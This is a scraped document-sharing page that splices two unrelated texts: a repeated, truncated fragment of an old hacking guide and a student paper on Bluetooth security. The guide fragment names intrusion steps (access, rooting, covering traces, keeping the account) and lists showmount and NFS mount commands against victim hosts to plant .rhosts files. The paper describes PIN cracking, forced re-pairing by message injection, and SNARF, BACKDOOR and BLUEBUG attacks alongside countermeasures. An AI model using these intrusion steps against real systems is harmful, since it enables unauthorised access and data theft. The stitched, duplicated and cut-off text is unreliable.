VIEWS: 14 PAGES: 7 POSTED ON: 6/29/2012
Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).
Copyright and stuff...
If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...;)
I ain't responsible for any damages you made after reading this...(I'm very
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press .
Intro: Hacking step by step.
Well, this ain't exactely for begginers, but it'll have to do.
What all hackers has to know is that there are 4 steps in hacking...
Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.
Ok. In the next pages we'll see exactely what I ment.
Step 1: Getting access.
Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:
mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.
If it gives a message like this one, then it's time to search another way
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
Let's see what happens...
mysite:~>/usr/sbin/showmount -e victim1.site.com
mysite:~>/bin/mount -nt nfs victim1.si
User's guide __________________________ Well, howdi folks... I guess you are all wondering who's this guy (me) that's trying to show you a bit of everything... ? Well, I ain't telling you anything of that... Copyright, and other stuff like this (below). Copyright and stuff... ______________________ If you feel offended by this subject (hacking) or you think that you could do better, don't read the below information... This file is for educational purposes ONLY...;) I ain't responsible for any damages you made after reading this...(I'm very serious...) So this can be copied, but not modified (send me the changes, and if they are good, I'll include them ). Don't read it, 'cuz it might be illegal. I warned you... If you would like to continue, press . Intro: Hacking step by step. _________________________________________________________________________________ Well, this ain't exactely for begginers, but it'll have to do. What all hackers has to know is that there are 4 steps in hacking... Step 1: Getting access to site. Step 2: Hacking r00t. Step 3: Covering your traces. Step 4: Keeping that account. Ok. In the next pages we'll see exactely what I ment. Step 1: Getting access. _______ Well folks, there are several methods to get access to a site. I'll try to explain the most used ones. The first thing I do is see if the system has an export list: mysite:~>/usr/sbin/showmount -e victim.site.com RPC: Program not registered. If it gives a message like this one, then it's time to search another way in. What I was trying to do was to exploit an old security problem by most SUN OS's that could allow an remote attacker to add a .rhosts to a users home directory... (That was possible if the site had mounted their home directory. Let's see what happens... mysite:~>/usr/sbin/showmount -e victim1.site.com /usr victim2.site.com /home (everyone) /cdrom (everyone) mysite:~>mkdir /tmp/mount mysite:~>/bin/mount -nt nfs victim1.si
BLUETOOTH HACKING PRERIT KAPADIA ABHAS MANGAL ID: 185 ID: 183 firstname.lastname@example.org email@example.com Project ID : CV-75 Project ID : CV-75 ABSTRACT in the initial process itself. The encryption algorithm followed during the pairing process Want to immerse your handhelds, laptops or is also discussed. Moreover dictionary of the other electronic goodies in the world of different types of attack and malicious tricks Bluetooth, better rethink because are you then they follow in order to gain control over really secure? Want to learn more then different services provided by the Bluetooth proceed ahead. Here you would have a trip to enabled devices is also dealt with in the paper. various procedures in which many different The various counter-measures needed to be types of attacks would try their hands to taken in order to prevent our beloved capture the personal information of your Bluetooth devices from being hacked are Bluetooth enabled device. But would they suggested. Paper also brings to center of really hang out? Find out ahead .We cruise attention the process of scanning of Bluetooth through three important processes (the pairing address thus enabling ethical hackers like us to process) which any Bluetooth device must come in contact with the alien Bluetooth follow before transferring data using PIN and devices. also mentioned are the points to crack the PIN - Close proximity not required as with infrared data (IrDA) communication devices as Bluetooth doesn't suffer from interference What is Bluetooth? from obstacles such as walls. - Supports both point-to-point wireless Bluetooth is a wireless technology that enables connections without cables between mobile any electrical device to wirelessly phones and personal computers, as well as communicate in the 2.5 GHz ISM (license point-to-multipoint connections to enable ad free) frequency band. It allows devices such as hoc local wireless networks. mobile phones, headsets, PDA's and portable computers to communicate and send data to - It uses unlicensed ISM (Industrial, Scientific each other without the need for wires or cables and Medical) band, 2400 - 2483.5 MHz, to link to devices together. It has been Modulation - Gaussian frequency shift keying,. specifically designed as a low cost, low power, Frequency Hopping Spread Spectrum - 1600 radio technology, which is particularly suited hops/sec, amongst 79 channels, spaced at 1 to the short range Personal Area Network MHz separation. (PAN) application. (It is the design focus on low cost, low size and low power, which distinguishes it from the IEEE 802.11 wireless LAN technology). When and How was it Conceived? Bluetooth was originally conceived by The Main Features of Bluetooth: Ericsson in 1994, when they began a study to - Operates in the 2.4GHz frequency band examine alternatives to cables that linked without a license for wireless communication. mobile phone accessories. - Real-time data transfer usually possible between 10-100m. Where did the Name Come From? This algorithm outputs a 128-bit word, which Bluetooth was named after Herald Blatand (or is referred to as the initialization key (Kinit). Bluetooth), a tenth century Danish Viking king who had united and controlled large parts of Figure 1 describes how Kinit is generated using Scandinavia which are today Denmark and E22. Note that the PIN code is available at both Norway. The name was chosen to highlight Bluetooth devices, and the 128 bit IN_RAND is the potential of the technology to unify the transmitted in plaintext. As for the BD_ADDR: telecommunications and computing industries if one of the devices has a fixed PIN, they use the BD_ADDR of the peer device. If both have SIG Membership? a variable PIN, they use the PIN of the slave Since its original foundation, the Bluetooth device that receives the IN_RAND. In Figure 1, SIG has transitioned into a not-for-profit trade if both devices have a variable PIN, association, Bluetooth SIG, Inc. Membership BD_ADDRB shall be used. The Bluetooth is open to all companies wishing to develop, device address can be obtained via an inquiry market and promote Bluetooth products at two routine by a device. This is usually done before levels - Associate and Adopter Members. connection establishment begins This initialization key (Kinit) is used only Bluetooth Security during the pairing process. Upon the creation of the link key (Kab), the Kinit key is discarded. 1 The Bluetooth pairing & authentication process The Bluetooth initialization procedures consist of 3 or 4 steps: 1. Creation of an initialization key (Kinit). 2. Creation of a link key (Kab). 3. Authentication. After the 3 pairing steps are completed, the devices can derive an encryption key to hide all future communication in an optional fourth step. Before the pairing process can begin, the PIN code must be entered into both Bluetooth devices. Note that in some devices (like wireless earphones) the PIN is fixed and Figure 1: Generation of Kinit using E22 cannot be changed. In such cases, the fixed PIN is entered into the peer device. If two devices have a fixed PIN, they cannot be paired, and therefore cannot communicate. In 2.1.2 Creation of Kab the following sections we go into the details of After creating the initialization key, the the steps of the pairing process. devices create the link key Kab. The devices use the initialization key to exchange two new 128 bit random words, known as LK_RANDA and LK_RANDB. Each device selects a random 128 1 Creation of Kinit bit word and sends it to the other device after The Kinit key is created using the E22 algorithm, bitwise xoring it with Kinit. Since both devices whose inputs are: know Kinit, each device now holds both random numbers LK_RANDA and LK_RANDB. Using 1. a BD_ADDR. the E21 algorithm, both devices create the link 2. the PIN code and its length. key Kab. The inputs of E21 algorithm are: 3. a 128 bit random number IN_RAND. 1. a BD_ADDR. 2. The 128 bit random number LK_RAND. Note that E21 is used twice is each device, with two sets of inputs. Figure 2 describes how the link key Kab is created. Figure 3: Mutual authentication process using E1 2.2 Bluetooth cryptographic primitives As we described above, the Bluetooth pairing Figure 2: Generation of Kab using E21 and authentication process uses three algorithms: E22, E21, E1. All of these algorithms are based on the SAFER+ cipher with some 2.1.3 Mutual authentication modifications. Here we describe features of SAFER+ that are relevant to our attack. Upon creation of the link key Kab, mutual authentication is performed. This process is based on a challenge-response scheme. One of the devices, the verifier, randomizes and sends 2.2.1 Description of SAFER+ (in plaintext) a 128 bit word called SAFER+ is a block cipher with a block size of AU_RANDA. The other device, the claimant, 128 bits and three different key lengths: 128, calculates a 32 bit word called SRES using an 192 and 256 bits. Bluetooth uses SAFER+ algorithm E1. The claimant sends the 32 bit with 128 bit key length. In this mode, SAFER+ SRES word as a reply to the verifier, who consists of: verifies (by performing the same calculations) the response word. If the response word is 1. KSA - A key scheduling algorithm successful, the verifier and the claimant change that produces 17 different 128-bit roles and repeat the entire process. Figure 3 subkeys. describes the process of mutual authentication. 2. 8 identical rounds. The inputs to E1 are: 3. An output transformation - which is implemented as a xor between the 1. The random word AU_RANDA. output of the last round and the last 2. The link key Kab. subkey. 3. Its own Bluetooth device address (BD_ADDRB). Figure 4 describes the inner design of SAFER+, as it is used in Bluetooth. Note that as a side effect of the authentication process, both peers calculate a 96 bit word called ACO. This word is optionally used during the creation of the encryption key. The creation of this encryption key exceeds our primary discussion and shall not be described in this paper. Table 1: List of messages sent during the pairing and authentication process. ``A'' and ``B'' denote the two Bluetooth devices. # Src Dst Data Length Notes 1 A B IN_RAND 128 bit plaintext XORed 2 A B LK_RANDA 128 bit with Kinit XORed 3 B A LK_RANDB 128 bit with Kinit 4 A B AU_RANDA 128 bit plaintext 5 B A SRES 32 bit plaintext 6 B A AU_RANDB 128 bit plaintext 7 A B SRES 32 bit plaintext Assume that the attacker eavesdropped on an entire pairing and authentication process, and Figure 4: Inner design of SAFER+ saved all the messages (see Table 1). The attacker can now use a brute force algorithm to The key scheduling algorithm (KSA) find the PIN used. The attacker enumerates all possible values of the PIN. Knowing The key scheduling algorithm used in IN_RAND and the BD_ADDR, the attacker SAFER+ produces 17 different 128-bit runs E22 with those inputs and the guessed subkeys, denoted K1 to K17. Each SAFER+ PIN, and finds a hypothesis for Kinit. The round uses 2 subkeys, and the last key is used attacker can now use this hypothesis of the in the SAFER+ output transformation. The initialization key, to decode messages 2 and 3. important details for our discussion are that in Messages 2 and 3 contain enough information each step of the KSA, each byte is cyclic- to perform the calculation of the link key Kab, rotated left by 3 bit positions, and 16 bytes (out giving the attacker a hypothesis of Kab. The of 17) are selected for the output subkey. In attacker now uses the data in the last 4 addition, a 128 bit bias vector, different in each messages to test the hypothesis: Using Kab and step, is added to the selected output bytes. the transmitted AU_RANDA (message 4), the attacker calculates SRES and compares it to the data of message 5. If necessary, the attacker The SAFER+ Round can use the value of messages 6 and 7 to re- verify the hypothesis Kab until the correct PIN As depicted, SAFER+ consists of 8 identical is found. Figure 6 describes the entire process rounds. Each round calculates a 128 bit word of PIN cracking. out of two subkeys and a 128 bit input word from the previous round. Note that the attack, as described, is only fully successful against PIN values of under 64 bits. 3 Bluetooth PIN Cracking If the PIN is longer, then with high probability there will be multiple PIN candidates, since the two SRES values only provide 64 bits of data 3.1 The Basic Attack: to test against. A 64 bit PIN is equivalent to a 19 decimal digits PIN. the messages and crack the PIN using the primary attack described in this paper. 4.2 Attack details Assume that two Bluetooth devices that have already been paired before now intend to establish communication again. This means that they don't need to create the link key Kab again, since they have already created and stored it before. They proceed directly to the Authentication phase (Recall Figure 3). We describe three different methods that can be used to force the devices to repeat the pairing process. The efficiency of each method depends on the implementation of the Bluetooth core in the device under attack. These methods appear in order of efficiency: 1. Since the devices skipped the pairing process and proceeded directly to the Authentication phase, the master device sends the slave an AU_RAND message, and expects the SRES message in return. Note that Bluetooth specifications allow a Bluetooth device to forget a link key. In such a case, the slave sends an LMP_not_accepted message in return, to let the master know it has forgotten the link key. Therefore, after the master device has sent the AU_RAND message to the slave, the Figure 6: The Basic Attack Structure. attacker injects a LMP_not_accepted message toward the master. The master will be convinced that the 4 The Re-Pairing attack slave has lost the link key and pairing will be restarted. Restarting the 4.1 Background and motivation pairing procedure causes the master to This section describes an additional attack on discard the link key. This assures Bluetooth devices that is useful when used in pairing must be done before devices conjunction with the primary attack described can authenticate again. in Section 3. Recall that the primary attack is 2. At the beginning of the only applicable if the attacker has Authentication phase, the master eavesdropped on the entire process of pairing device is supposed to send the and authentication. This is a major limitation AU_RAND to the slave. If before since the pairing process is rarely repeated. doing so, the attacker injects a Once the link key Kab is created, each IN_RAND message toward the slave, Bluetooth device stores it for possible future the slave device will be convinced the communication with the peer device. If at a master has lost the link key and later point in time the device initiates pairing is restarted. This will cause communication with the same peer - the stored the connection establishment to link key is used and the pairing process is restart. skipped. Our second attack exploits the 3. During the Authentication phase, the connection establishment protocol to force the master device sends the slave an communicating devices to repeat the pairing AU_RAND message, and expects a process. This allows the attacker to record all SRES message in return. If, after the master has sent the AU_RAND message, an attacker injects a random 5 Countermeasures SRES message toward the master, this This section details the countermeasures one will cause the Authentication phase to should consider when using a Bluetooth restart, and repeated attempts will be device. These countermeasures will reduce the made. At some point, after a certain probability of being subjected to both attacks number of failed authentication and the vulnerability to these attacks. attempts, the master device is expected to declare that the 1. Since Bluetooth is a wireless technology, it authentication procedure has failed is very difficult to avoid Bluetooth signals (implementation dependent) and from leaking outside the desired boundaries. initiate pairing. Therefore, one should follow the 4. The three methods described above recommendation in the Bluetooth standard and cause one of the devices to discard its refrain from entering the PIN into the link key. This assures the pairing Bluetooth device for pairing as much as process will occur during the next possible. This reduces the risk of an attacker connection establishment, so the eavesdropping on the pairing process and attacker will be able to eavesdrop on finding the PIN used. the entire process, and use the method described in Section 3 to crack the Most Bluetooth devices save the link key (Kab) PIN. in non-volatile memory for future use. This way, when the same Bluetooth devices wish to In order to make the attack ``online'', the communicate again, they use the stored link attacker can save all the messages transferred key. However, there is another mode of work, between the devices after the pairing is which requires entering the PIN into both complete. After breaking the PIN (0.06-0.3 sec devices every time they wish to communicate, for a 4 digit PIN), the attacker can decode the even if they have already been paired before. saved messages, and continue to eavesdrop and This mode gives a false sense of security! decode the communication on the fly. Since Starting the pairing process every time Bluetooth supports a bit rate of 1 Megabit per increases the probability of an attacker second, a 40KB buffer is more than enough for eavesdropping on the messages transferred. the common case of a 4 digit PIN. We suggest not to use this mode of work. Notes: 2. Finally, the PIN length ranges from 8 to 128 bits. Most manufacturers use a 4 digit PIN and 1. The Bluetooth specification does supply it with the device. Obviously, allow devices to forget link keys and customers should demand the ability to use to require repeating the pairing longer PINs. process. This fact makes the re- pairing attack applicable. 3.Instead of passing messages in plain text, 2. Re-Pairing is an active attack, that they should be encoded before transmission. requires the attacker to inject a specific message at a precise point in the protocol. This is most likely needs The Future of Bluetooth a custom Bluetooth device since off- the-shelf components will be unable The next version of Bluetooth, currently code to support such behavior. named Lisbon, includes a number of features 3. If the slave device verifies that the to increase security, usability and value of message it receives is from the correct Bluetooth. The following features are defined: BD_ADDR, then the attack requires the injected message to have its source BD_ADDR ``spoofed'' - again - Atomic Encryption Change requiring custom hardware. - Extended Inquiry Response 4. If the attack is successful, the - Sniff Subrating QoS Improvements Bluetooth user will need to enter the - Simple Pairing PIN again - so a suspicious user may realize that his Bluetooth device is Types of attacks in Bluetooth under attack and refuse to enter the PIN. The SNARF attack: expensive destinations, or for identity theft by It is possible, on some makes of device, to impersonation of the victim. connect to the device without alerting the owner of the target device of the request, and Scanning for Bluetooth addresses gain access to restricted portions of the stored data therein, including the entire phonebook The Bluetooth address itself is a unique 48bit (and any images or other data associated with device identifier, where the first 3 bytes of the the entries), calendar, realtime clock, business address are assigned to a specific manufacturer card, properties, change log, IMEI by the IEEE (www.ieee.org/), and the last 3 (International Mobile Equipment Identity , bytes are freely allocated by the manufacturer. which uniquely identifies the phone to the For example, the hexadecimal representation mobile network, and is used in illegal phone of a Sony Ericsson P900 phone's Bluetooth 'cloning'). This is normally only possible if the address may look like 00:0A:D9:EB:66:C7, device is in "discoverable" or "visible" mode, where the first 3 bytes of this address but there are tools available on the Internet that (00:0A:D9) are registered to Sony Ericsson by allow even this safety net to be bypassed. the IEEE, meaning that all P900 phones will have their Bluetooth address starting with same 3 bytes. The last 3 bytes (EB:66:C7) of The BACKDOOR attack: the sample address are assigned to this device The backdoor attack involves establishing a by Sony Ericsson and should be different for trust relationship through the "pairing" each P900 phone -- but is not always, mechanism, but ensuring that it no longer unfortunately. appears in the target's register of paired devices. In this way, unless the owner is In theory, enabling the non-discoverable mode actually observing their device at the precise on a Bluetooth device should protect users moment a connection is established. Device from unauthorized connections, yet in practice grants access to services. This means that not it is still quite possible to find these devices. only can data be retrieved from the phone, but There are software tools available which allow other services, such as modems or Internet, brute-force discovery of non-discoverable WAP and GPRS gateways may be accessed devices. An example of such an application is without the owner's knowledge or consent. RedFang by Ollie Whitehouse, a small Indications are that once the backdoor is application which simply tries to connect to a installed, the above SNARF attack will unique Bluetooth address one by one, until function on devices that previously denied finally a hidden device answers the request access, and without the restrictions of a plain sent that was sent to that particular address. SNARF attack, so we strongly suspect that the Author's initial test is a minimum of 6 seconds other services will prove to be available also. to achieve a good level of accuracy (it varies from 2.5 to 10 seconds, on average). It is The BLUEBUG attack: certainly possible to find a hidden device in The bluebug attack creates a serial profile less than 3 seconds, The address space used by connection to the device, thereby giving full Sony Ericsson has 16,777,216 possible access to the AT command set, which can then addresses. If we assume 6 seconds are required be exploited using standard off the shelf tools, per device, the total scan would take us 1165 such as PPP for networking and gnokii for days, meaning we would need more than 3 messaging, contact management, diverts and years to discover all hidden Sony Ericsson initiating calls. With this facility, it is possible phones in a conference room. to use the phone to initiate calls to premium rate numbers, send sms messages, read sms messages, connect to data services such as the Conclusion: Internet, and even monitor conversations in the With the advancement of digital convergence vicinity of the phone. This latter is done via a on M-commerce, usuage of bluetooth in voice call over the GSM network, so the connecting different devices is going to be listening post can be anywhere in the world. significant. But to make communication more Bluetooth access is only required for a few secure advancement in the prospect of security seconds in order to set up the call. Call must not be neglected. forwarding diverts can be set up, allowing the owner's incoming calls to be intercepted, either Reference: to provide a channel for calls to more www.trfinite.org www.bluetooth.com
Pages to are hidden for
"bluetooth hacking"Please download to view full document